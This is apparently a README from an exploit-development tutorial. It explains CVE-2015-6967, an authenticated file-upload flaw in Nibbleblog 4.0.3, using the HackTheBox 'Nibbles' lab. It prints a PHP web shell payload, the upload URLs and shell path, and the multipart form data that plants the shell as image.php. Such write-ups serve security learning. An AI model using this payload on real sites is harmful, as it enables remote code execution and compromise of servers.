来源

关联漏洞

介绍

# ExploitDev Journey #9 | CVE-2015-6967 | Nibbleblog 4.0.3 - Arbitrary File Upload
Original Exploit: https://www.exploit-db.com/exploits/38489 <br>

**Exploit name:** Nibbleblog 4.0.3 RCE <br>
**CVE**: 2015-6967 <br>
**Lab**: Nibbles - HackTheBox


### Description
There is a flaw in Nibbleblog 4.0.3 that allows an authenticated user to upload shells. Uploading shells here is kind of different from what you have already seen before, you can name your shell `r57.php` however that doesn't matter because it can only be accessed through `image.php`. So in a way you are basically overwriting the contents of `image.php` with your payload but that's not the case. You upload files with whatever name you want but you can only access them by using the `image.php` name.

<br>

### How it works
In this session, you won't actually need the `gen_random_charset()` function because there is no point in naming your shell something unique. Here is how it works:
- You authenticate to the website using a username and password
- You upload an image through the plugins section of nibbleblog
- You open your shell and do business as usual

<br>

### Writing the exploit
First we define some important variables:
```py
login_url = f'{rhost}/nibbleblog/admin.php'
image_url = f"{rhost}/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image"
payload = '<?php echo shell_exec($_GET["rce"]); ?>'
shell_path = f"{rhost}/nibbleblog/content/private/plugins/my_image/image.php"
```

You are familiar with them all except that `shell_path` is just going to open `image.php` and not some file generated with random charset. <br>
You were already already introduced to session management in Python and you already know how to login to an application, this application is no different than what you have already seen before.

The POST data that you are going to send is kind of long and might look odd to you:
```py
data = {
        "plugin": (None, 'my_image'), "title": (None, 'My image'), "position": (None, 4), "caption": "",
        "image": ('doesnt_matter.php', payload, "application/x-php", {'Content-Disposition': 'form-data'}),
        "image_resize": (None, 1), "image_width": (None, 200), "image_height": (None, 200), "image_option": (None, 'auto')
    }
```

The reason is the application expects some weird data like title of the image, position, caption, height and width, etc. The rest of the exploit is self-explanatory and should be easy for you to understand.

<br>

### Final thoughts
In this exploit development session you learned that not all applications allow you to upload your own files with custom names. Some applications operate differently and this web app is one of them, we didn't have a say in choosing a name here, our file would be uploaded as `image.php` which isn't bad. At last all we need is the shell.

文件快照

 [4.0K]  /data/pocs/f1e0522372f94508d3e20700ee72c42dcda6a78c
├── [2.4K]  exploit.py
└── [2.8K]  README.md

0 directories, 2 files

备注